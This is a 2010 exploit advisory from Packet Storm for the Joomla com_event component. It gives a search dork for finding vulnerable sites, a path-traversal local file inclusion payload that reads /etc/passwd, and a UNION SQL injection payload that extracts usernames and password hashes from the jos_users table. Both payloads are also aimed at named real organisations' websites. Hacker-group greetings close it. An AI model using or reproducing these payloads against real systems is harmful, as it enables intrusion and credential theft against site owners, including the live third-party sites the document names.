Joomla Event Local File Inclusion

2010-05-19T00:00:00
ID PACKETSTORM:89626
Type packetstorm
Reporter altbta
Modified 2010-05-19T00:00:00

Description

                                        
                                            `  
  
####################################################################  
>>>>> Author : altbta (l_9@hotmail.com)  
>>>>> Home : [v4-team.com].[xp10.me]  
>>>>> Script : Joomla Component com_event  
>>>>> Bug Type : Multiple Vulnerabilities  
>>>>> Dork : inurl:"com_event"  
  
####################################################################  
  
===[ Exploit ]=== [LFI]  
  
http://site/index.php?option=com_event&view=[LFI]  
http://site/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00  
'  
  
===[ Example ]===  
  
http://www.eurocham.org.sg/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00  
'  
  
===[ Exploit ]=== [sql]  
  
http://site/index.php?option=com_event&task=details&sid=61 [sql]  
http://site/index.php?option=com_event&task=details&sid=-61 union select  
1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--  
  
===[ Example ]===  
  
http://www.eeii.org.in/index.php?option=com_event&task=details&sid=-61 union  
select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--  
  
####################################################################  
RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3  
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito  
SnIpEr.SiTeS  
  
  
  
`